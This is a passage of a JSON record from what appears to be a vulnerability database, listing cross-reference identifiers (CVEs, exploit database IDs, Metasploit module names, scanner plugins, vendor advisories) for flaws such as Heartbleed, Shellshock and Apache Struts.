"AKB:5200081C-5C1D-47C7-88A9-89C269E0482E", "AKB:6840D66E-0E62-484F-9172-6FC67F905258", "AKB:6AB96156-E704-460D-9CB4-65F529E51D90", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:7AD2ABEF-642C-4C50-B84F-BB1FCBC66D8B", "AKB:7E88FA13-5594-41E0-B57C-734E78ACDD62", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:A8B25CF8-4C17-4A7A-A4F2-C89EC89A8205", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:CC9CD3C9-B8CC-456B-9B8A-33A1EB9498E9", "AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890", "AKB:D165638B-97C5-4C99-BFA0-70576DB52324"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F", "AVLEONOV:B5CA8049524C96A911991EE8ADF24F64", "AVLEONOV:CA14883EDC0D830220313DB4AE994C8A"]}, {"type": "canvas", "idList": ["IIS6_PROPFIND", "STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2014:0376", "CESA-2014:1293", "CESA-2014:1306", "CESA-2017:3080", "CESA-2017:3081"]}, {"type": "cert", "idList": ["VU:112992", "VU:252743", "VU:720951", "VU:834067", "VU:999601"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2009-312", "CPAI-2014-1336", "CPAI-2014-1846", "CPAI-2014-2415", "CPAI-2017-0197", "CPAI-2017-0249", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-1088", "CPAI-2018-0192", "CPAI-2018-0459", "CPAI-2018-0849", "CPAI-2018-1697"]}, {"type": "checkpoint_security", "idList": ["CPS:SK100173", "CPS:SK102673"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:6A3DB540F84D34B9BB99751624D91DB9", "CISA:C0680147E070CCC4182A654B22694B78", "CISA:D39D876E64786DC5F13FB718A4507342", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2014-0160", "CISA-KEV-CVE-2014-6271", "CISA-KEV-CVE-2014-7169", "CISA-KEV-CVE-2017-10271", "CISA-KEV-CVE-2017-12617", "CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2017-7269", "CISA-KEV-CVE-2017-9805", "CISA-KEV-CVE-2018-10561", "CISA-KEV-CVE-2018-10562", "CISA-KEV-CVE-2018-11776", "CISA-KEV-CVE-2018-7600"]}, {"type": "cisco", "idList": ["CISCO-SA-20140408-CVE-2014-0160", "CISCO-SA-20140409-ASA", "CISCO-SA-20140409-HEARTBLEED", "CISCO-SA-20140430-MXP", "CISCO-SA-20140430-TCTE", "CISCO-SA-20140926-BASH", "CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2", "CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "citrix", "idList": ["CTX140605", "CTX200217"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2009-4189", "CVE-2014-0160", "CVE-2014-0346", "CVE-2014-0964", "CVE-2014-2601", "CVE-2014-3671", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-62771", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7227", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"]}, {"type": "debian", "idList": ["DEBIAN:ACBAE732DF5CF430594D30872D7BB6CA:B482A", "DEBIAN:BFFF1A1BB8985A1554EE139FD940DFD1:B482A", "DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DLA-63-1:7012F", "DEBIAN:DSA-1199-1:38FEB", "DEBIAN:DSA-1199-1:7FD00", "DEBIAN:DSA-2896-1:7AEC1", "DEBIAN:DSA-2896-1:B52FE", "DEBIAN:DSA-2896-2:26053", "DEBIAN:DSA-2896-2:FEB91", "DEBIAN:DSA-3032-1:EB739", "DEBIAN:DSA-3035-1:8A617", "DEBIAN:DSA-3035-1:AEAF0", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-0160", "DEBIANCVE:CVE-2014-6271", "DEBIANCVE:CVE-2014-6277", "DEBIANCVE:CVE-2014-6278", "DEBIANCVE:CVE-2014-7169", "DEBIANCVE:CVE-2017-12617", "DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-490", "E-627", "E-638", "E-639", "E-643", "E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:32745", "EDB-ID:32764", "EDB-ID:32791", "EDB-ID:32998", "EDB-ID:34777", "EDB-ID:34839", "EDB-ID:34879", "EDB-ID:35115", "EDB-ID:35146", "EDB-ID:37816", "EDB-ID:38849", "EDB-ID:38982", "EDB-ID:39918", "EDB-ID:40619", "EDB-ID:40938", "EDB-ID:41992", "EDB-ID:42627", "EDB-ID:42953", "EDB-ID:42966", "EDB-ID:43008", "EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:45260", "EDB-ID:45367", "EDB-ID:46469", "EDB-ID:48651"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1020403320036D688D074B47660E9F50", "EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "EXPLOITPACK:282B7A409B106ACEA21CAF83B6D41BAD", "EXPLOITPACK:28422BD346C315BD9B02E4A18C1B9B0A", "EXPLOITPACK:31B3E3F4C5EABC55DF384007CB11320A", "EXPLOITPACK:35CA87EB321039B8FCD10FF7077070EC", "EXPLOITPACK:47FD05A7865BD1C6E41B36173837F9F9", "EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:674E0F21E3254A3C7A39F2F66070C4E6", "EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8", "EXPLOITPACK:8D7CD3337FF4431147D67A3C62639747", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:B1EF149162970D578C2E9FBD8DA60CE1", "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:C890361C9DA2FA0264352384567E504E", "EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A", "EXPLOITPACK:DECB95CED9B0E098AA11F83C84BC431D", "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "EXPLOITPACK:E563140BD918794B55F61FC55941120F", "EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F"]}, {"type": "f5", "idList": ["F5:K15159", "F5:K15629", "F5:K22854260", "F5:K43451236", "F5:K53173544", "F5:K60499474", "F5:K84144321", "SOL15159", "SOL15629"]}, {"type": "fedora", "idList": ["FEDORA:0890F224F5", "FEDORA:17401605E206", "FEDORA:176C3219DB", "FEDORA:2C56E6076005", "FEDORA:381402161C", "FEDORA:3F234602D69C", "FEDORA:4227660CA765", "FEDORA:45D79604B015", "FEDORA:4A9CF241E0", "FEDORA:4B26D6048172", "FEDORA:4F615218BE", "FEDORA:5C39A60311F1", "FEDORA:6CE3D20E51", "FEDORA:6EB0220FFA", "FEDORA:6FC4121113", "FEDORA:7595560DCBCA", "FEDORA:89AF1217C1", "FEDORA:90F2B2192D", "FEDORA:9278321934", "FEDORA:997B660D68A4", "FEDORA:9DB7C245AA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:9FE1722338", "FEDORA:A7FE360648D0", "FEDORA:C277D20308", "FEDORA:C2CB46042D4E", "FEDORA:CA868607A1CD", "FEDORA:D89B16076A01", "FEDORA:DB25A6083B5B", "FEDORA:DDD696087CE5", "FEDORA:E150A6395ADF", "FEDORA:E67696087B8D"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "fortinet", "idList": ["FG-IR-14-011", "FG-IR-14-030", "FG-IR-17-205", "FG-IR-17-251"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978", "71AD81DA-4414-11E4-A33E-3C970E169BC2", "81E2B308-4A6C-11E4-B711-6805CA0B3D42", "A9E466E8-4144-11E8-A292-00E04C1EA73D", "C0DAE634-4820-4505-850D-B1C975D0F67D"]}, {"type": "freebsd_advisory", "idList": ["FREEBSD_ADVISORY:FREEBSD-SA-14:06.OPENSSL"]}, {"type": "gentoo", "idList": ["GLSA-200608-11", "GLSA-201404-07", "GLSA-201409-09", "GLSA-201409-10", "GLSA-201412-11"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-GG9M-FJ3V-R58C", "GHSA-J77Q-2QQG-6989", "GHSA-XJGH-84HX-56C5", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:C82C4FE9D1A6B81D79D6EF10C4F9D007"]}, {"type": "githubexploit", "idList": ["0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "CD8CABD7-BE65-5434-B682-F73ABA737C65"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:212022", "H1:212985", "H1:213069", "H1:29839", "H1:32570", "H1:44294", "H1:49139", "H1:576887", "H1:6475", "H1:6626", "H1:810755"]}, {"type": "hivepro", "idList": ["HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675"]}, {"type": "hp", "idList": ["HP:C04262495", "HP:C04262670", "HP:C04272043", "HP:C04468293"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140417-HEARTBLEED", "HUAWEI-SA-20141024-01-BASH", "HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["0139C39E0ED48888EF6FC334B5A408C62415667035711D7DAE1D3BB2BBBCA3F0", "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "02D84FEF44D33E0AEFACF9F0F69D208CD35169CED383AB4155C383F596F12961", "03BFD2D26D76C5E7FD24C265B3AB1C4D658726D972FB7039E562EEE0BD578CC0", "045DF1202D179679EADDD7C7D4DC1332D8A557CA511775BC45FC7FCC4AD803E8", "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "06DE81C34BCC037C425D4880FEE00C839756BAEBF07AE79D786A78C384E9210B", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "08F8D0B7EA0AFEA0B537D3C92CCA1CD2F37543CEE5C0324C3983B1853DEAA757", "0CB23FC13F3EB19A7C8056D322ACA53A2A0544016689C55669AABB31B1489BB9", "0F73246124CA58D05064BB5D07082DCA6F2A1D48630CAAC82BCFFB4A71F45CA7", "117ABC2BB4D7A895E16FCC067B9E6B9DCE6CCBE8F1CE1B3BD4A3D859DFD71577", "118621FA03E380AD3C1211B268A5AFE3C4B38593F2A28D9A680160FF8CA53F76", "1525B7B67DA5402BE989F9E37182D44E4D8FAE3BB181A2DBEA5C3A5BAB647E3B", "162D755E2D0C70591844B4890170B2078AD336DE2FD431C558D0656CFA3FF9F6", "19B0C3823304A57CA8A4365D56630AAA66F03D8A9A2C7D80D392B215229EC144", "1BB3EE36ADE9265927129667C322A2BAD2DE11F9FE467A2FADEFC55721ED556B", "1C6641956F91BACFC5632640A3A0F7C2D3293056B631EF470EE3E313F25B9DCA", "1CED1292C27C35E42496781B7D0CF1BF44D0FA9826C520CC5779A796AA223C94", "1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "2171324C6B19D0DF9EFFC1DD0369B83F9F3908C6A3D27810A8197FF1F4359802", "219D23DAB6D7EED6140DB01019ADA2A19ECEF81B9513870787828621344C3705", "221250DD6B489029C97D621490473ABEB793A5150987E9EA8B66A1F61836221E", "241764015F9D254F7DCC4395DF0618F1276C72740E982954EA1F0CA5B632EA25", "246324D712266791933CD30A5CD6D74FAE4DCA745F4E2F23D405A06F84C4B545", "26A7BDE71EA4560DCB34E2D71A77E04F6BD6F1464BE7B6966FCB08892C8C99B7", "2867ED57669AA4B34D3EF0DDF84503CFEC9E59CD944E8EFD11DEB62308D66163", "29DE375AE1BBACD32839B598C36BF61422BD120A061988F33FB4A8A3A6A7E152", "30CD66983833C710FEBDBB86E620F78B1353E7BF41B44CC7EBCBE9581842BA01", "316E3B03ABA494047F684B72F7481C4EE856CE1A71FDA23228F80AEA450980C4", "3346F09D47FA6190FF921754C8C848FD07311A63FCE6745EF3C5EBEA60481219", "33A2D938A19E3914057FE99E97D3DF3011B1A8BF0306735A9833ECB6E25BF454", "388EFD8B007684B48001D31307078170D5DBF01AEACBC98F2CB6247B827493F8", "3F47ABDD710544DE7DDFC14EFABDF45F6B3F2D204FB7DB5D2A2EDEC93057C399", "3F620340060D88E0720BA249D5F4ACA92F27A7CB779A70DE86567AF5830BFFEE", "41D560AE8F8A2118AE3B0A1F8A8B1D2C1A64B23EA566FD037C06A65121B3AC9D", "4250B3DD6EE0328D9C74AEF40742DE820FA06152EBCCE27DF8DD34DE016AB4B9", "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "48505FA45D5EF2C2F2DAF821BAFF313372A3A5C481E4A4C80F00A5B47B0CAD76", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "4E6C1EBA661D25285AF0C9F31E6EA09A55FE027BFFDE55BD865350A689CF283E", "542851630FD5F0CA12E39120280D90B66CBC639D15CC167486A7006068A5563D", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "553D216EA2182C94D1348ABC5AC9A5C3A6378A2F7CDCE63EE588563D39A80520", "5A9F334AFA4B494450FBF30984A3E8922AE4F1DBE4718E7AEA3FB58897B527BD", "6395629A0E23989CD0E9ED3783BCF74F63DAC89B9CC91AB177C14ED746139287", "63D38F71582A2FD4A2EB4EEBBD8E93ECFB4B3FA1A98D545F9F3D9A6E747E0174", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "650A9A77211F69137BAC17D5E4298C2133FCCDC13927C805DB7059805C98DEEA", "66E2077EC744F0C58908B64187C65DB343B9899133C02D3D2AD75F82D3A5771A", "6964DC74D7C00F0076CE970FCDCD238B596005A3E74FD77729ECDADA86E693C4", "69C6DC87734280D852260806EFBE5092E33CDD13BD800205307478AACD4FF4AE", "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "6D21A827942D7FB6C0C5B6338515182E4865775AF80DE980A4A3E5C3FE5BC2F0", "6D2739CB5EEAA7A3A1C71DE6B8DA41787C1350B34294A49002DC1ACAF827BCB8", "6D27D6F92103F9044938D906D1566EE9A7D04253F00F830992B267496F98D80B", "6F07F97886BF09D3AE553ACCDC565E6C3CD1F447D7CC27AAE1F4D764E57F3676", "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "72C3C112CF1DC2A570F563B5AF449BD1E6652DCB076C1FEB45C2F56954426340", "755824A31DD9B55DD0683629BAB6904C07FB7FEBC90E8C8B375BDBBA7446A707", "7715EFD05DACB6C1C9056FFC42480B4DC789358F0B882A2DEA7CDE7E65AC8BFF", "7B95C970241FF844878EBD4B455C0BCFBCD1202D17E6E0DF0871BB9904F3FA03", "7C26356586DAA6B4E139C967C18B932D1A22571BB403D6733844A6FF84BCFD1B", "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "7CF53FE09C7D25161BFAD59060E2F4269BC90C0B892337805721A0FE0A9BDA22", "7D0E5A7E08D2A1C445DDBAF53CAC0637D270176243B7EF28DE13FA0114E07937", "7DB6C2CA09E028522186834F9FCB09956130E6491477AC7C87B5AF5DEB923EC2", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "8310CBC6E528796179B83B849EFFF7D90582C2B848EDC0244A9E1FC18DB28EFB", "871A0564F000103EC07D1B9BC7B1DDE1427FEC3072CD636B9A5B83EE698D007E", "871E2FCABC6F21CC61ADDF08DCF0C21D87D03EE3765CA2D0F7C147FE88B3E98F", "88EAAD0F3FB0FE6AFDEDC902492B56BAAD194DB4D47D9DD8F7935300FABD0D33", "896307A4DE5A8A307511C17A3D7E04F8D4CB2D14EA0FBA42C535CB5B4F0A58D5", "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "8E22A4FFB15B939AF4541FA6B44C960EC9EEAA81440BBF608233357A2594E967", "8FC32FF825E7F34FFF1E058937771363F25EA13D9ABB207F7C96ACB9C5EF7010", "906C6E45A71E8A432DE51C6A94712DDA0BBA3529963A8AFA9DCFE84E05DA7425", "92653814B5AD58699CB141C05798FBA49CD5D97ED94F23B96F6DFAA714EA627D", "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "991C0CD42B0AEEB7638E5C78D6B1213E3B5F3402D64FD118A9ACFF710472945D", "9B43B0C0CA95946732831AB0472A7DB955732B9C49DA31DDC3DE61C583CD90E1", "9D491C37758A7876EBA0ED532934D141EF59226D12FAA8BFB9FF3F6D6ECFB954", "9E2EDC8A2FB65421E27FD2BBFAC4EBE0D362978BCD8EBC40091F01C703621294", "9ED43BB4CDEE5996AFFBB8BE301CBD62289B8BB9EA59070D1212F4A49D97E29F", "A054C15A595076E4A1D7AA4BC92F46B107013032C98CAEE03D3F4ED79AE98370", "A13CD0434706AFE250A0195612E2504B6A23E6C6A50F2939677B3EA7AE5AFBFA", "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "A83B03F799675C95BB22C73DAB5575BD3B2CB015DF75D254F3D332B552AF298D", "ABB0647A990D7F58EF2C3F027E8FF9EC3CFCBCFED6191131D99DFB361EAE80DA", "ACBD736D76ABF0AB3623E036AC6BC47E42139A1220680E700F18BF7798E7CC86", "AD24DE9115423BB2CB3853497E4C1DA1D8E55916F0CE3AEE3253F8DF8FFFE439", "B1B6459EEFEF79E0F4B8D6393831F95AB9B8FB385F999CD0CDE6381D630EC664", "B22CD4BEF0C9081C1D8052A6690FD92C44768291AA6E5A1D20F7857CF2812519", "B26BB0AC8248E0A7BFA153F3888A517C6692A3902CCDB85B130D96D69E70C4D7", "B4CEF4EA7801F7EE87B56D3E04386CF47754F271295C4BD79D9309059C16112E", "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "BB06E8BD028B2DF581C4E507E45CF66921EDD872018812A67B8FFD9CD3141ABF", "BC57AC1056A61CC76843C47F735B452A5A5F844C70175A7728D7F6370F0B6261", "BF3A7BD6BE50D37B415BA9BC0DB9B934F87D1542D401F138EDC112621D2BB667", "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "C4FDEDC3D060EDF89606BFC32AA0B02B8F40EF19D70E9CAD79641186FFE43357", "C596338966F1610A28DC01FBB21502CC71651B70DBC8B96D9603EBE432E4D5E6", "C8FEEACA92A2A3DA942D806A8DD1A62D9FF588BC8511496B60CEDE2A43134314", "CA879CAC5D259DF9801958C7109627A6039185F7E73D37875A7DA78F5F176A68", "CBF67977B45C068A3915580DA313F5784473D96FF8787169E5FF991983B14CD6", "D1C6923069C25898D406F7A96938114034238E1842EF324C902186C854A275A5", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D41C12FBC700B1C1A9A83784082394BE3AA1A560141066160B2FD4DDF6C14DD4", "D765B0E424B32B58901509C0B37E90B68BD6A9A3ED95D1DE2E1DF2893F546155", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "D8BB0C04F4C87E1FB90E8BB3AE2E9667CC6668F2651561409DB510A8857B4220", "DB90B12CB00DA651613B8CEA1042CD2F0BCE3752CA67DAA0D3AD348B3C4AA6F2", "DD6D1ADB4E0823703EC8B875E430BC4DA6EC03FE4D9BEBF09A0A0BA75C5488A1", "DD74A94DCFD49E41C76C5DDF42C914B945842C457C59BD3AA077859815577B84", "E0B94384680B705B44FF092CCD406D3C21502CF270D0853EFD258F97DB74E953", "E1858649536717A99AC04F109E352BC152EA8F1FD92A510CE0AB9AE0424A1CE4", "E1A56F82327D8FB00BD84085E673D1401848A384A92C33B13DC0ED642E86946B", "E2BB43D9DCFAAF1172FDDD2E46ECD410924036D49C8E4E9B1CB5312FDD5E81C8", "E3E6FF1C4B7407C34CEF6142D8E94DDAFD4C205B712F9DB877A5A5023358CB67", "E5F15DA9F93386337EA3C648C3342540CC2CD1058B2C028C6303B449D17EC544", "E9875BEF8E97815B76ED1D0FD7D59E5669EDACF80D617A93E84594F2257B2901", "ED25520B668714457490EC7907530FE368D1DD7120FD7A98A7598F3BBE3A9333", "EE50B1A5AF778319698593697BE11C93BF03E19DEE9CE25FF7BD2F12582783CA", "EE96B54621D843DBAEC73E1584C38A5C7C93422115268CA4F14F24F6540CB3F6", "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "F1ED0852D75B26B636AE97EEEDFC15EBA6FD53059DB84EDE5C24543996C89A7F", "F7B18297158774ACB53730B0EDA1769CE1870FC3ACD164CDD833ED2C0723B090", "FC10782A879F5738FDF43855B83775F2332A626EC335AD556DA5907A2CB0B2E9", "FCE8CB9EC748BEA35F6D8F122632ACA729BC03129A749D9453A43D584D43CBDD", "FEADDA47EFE90B54452280140F698F39B3035C331C1D98DE94C00F9304C7DEFC", "FFB7141336F1A9E6248E2772F23466B140BF02598A4866943007366E53204B45"]}, {"type": "ics", "idList": ["AA20-133A", "AA21-209A", "ICSA-14-105-02A", "ICSA-14-105-03B", "ICSA-14-114-01", "ICSA-14-126-01A", "ICSA-14-128-01", "ICSA-14-135-02", "ICSA-14-135-04", "ICSA-14-135-05", "ICSA-14-269-01A", "ICSA-15-344-01", "ICSA-15-344-01B", "ICSMA-17-215-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00037"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kaspersky", "idList": ["KLA10999", "KLA11118"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:1907207623071471216", "KITPLOIT:2304674796555328667", "KITPLOIT:2779031464033627796", "KITPLOIT:4583746754784092967", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:6372579284509577146", "KITPLOIT:7553690576096019209", "KITPLOIT:7835941952769002973", "KITPLOIT:7942195329946074809", "KITPLOIT:8661324951126484733", "KITPLOIT:8672599587089685905", "KITPLOIT:8708017483803645203", "KITPLOIT:8800200070735873517", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6", "KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-GNU-BOURNE-AGAIN-SHELL-BASH-SHELLSHOCK-NOSID", "LENOVO:PS500044-NOSID", "LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0165", "MGASA-2014-0256", "MGASA-2014-0388", "MGASA-2014-0393", "MGASA-2017-0400"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-APACHE_MOD_CGI_BASH_ENV-", "MSF:EXPLOIT-LINUX-HTTP-ADVANTECH_SWITCH_BASH_ENV_EXEC-", "MSF:EXPLOIT-LINUX-HTTP-IPFIRE_BASHBUG_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_MOD_CGI_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-CUPS_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_REST_XSTREAM-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_CONNECTIONID_WRITE-", "MSF:EXPLOIT-WINDOWS-IIS-IIS_WEBDAV_SCSTORAGEPATHFROMURL-"]}, {"type": "mmpc", "idList": ["MMPC:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "mskb", "idList": ["KB3197835"]}, {"type": "mssecure", "idList": ["MSSECURE:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "myhack58", "idList": ["MYHACK58:62201444409", "MYHACK58:62201454156", "MYHACK58:62201454165", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201784747", "MYHACK58:62201784836", "MYHACK58:62201785000", "MYHACK58:62201785039", "MYHACK58:62201785050", "MYHACK58:62201785397", "MYHACK58:62201786819", "MYHACK58:62201789104", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201892188", "MYHACK58:62201892204", "MYHACK58:62201993410"]}, {"type": "n0where", "idList": ["N0WHERE:76566"]}, {"type": "nessus", "idList": ["700055.PRM", "700674.PASL", "8194.PRM", "AIX_OPENSSL_ADVISORY7.NASL", "ALA_ALAS-2014-320.NASL", "ALA_ALAS-2014-418.NASL", "ALA_ALAS-2014-419.NASL", "ALA_ALAS-2017-913.NASL", "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL", "ATTACHMATE_REFLECTION_X_HEARTBLEED.NASL", "BASH_CVE_2014_6271_RCE.NASL", "BASH_CVE_2014_6278.NASL", "BASH_REMOTE_CODE_EXECUTION.NASL", "BLACKBERRY_ES_UDS_KB35882.NASL", "BLUECOAT_PROXY_AV_3_5_1_9.NASL", "BLUECOAT_PROXY_SG_6_5_3_6.NASL", "CENTOS_RHSA-2014-0376.NASL", "CENTOS_RHSA-2014-1293.NASL", 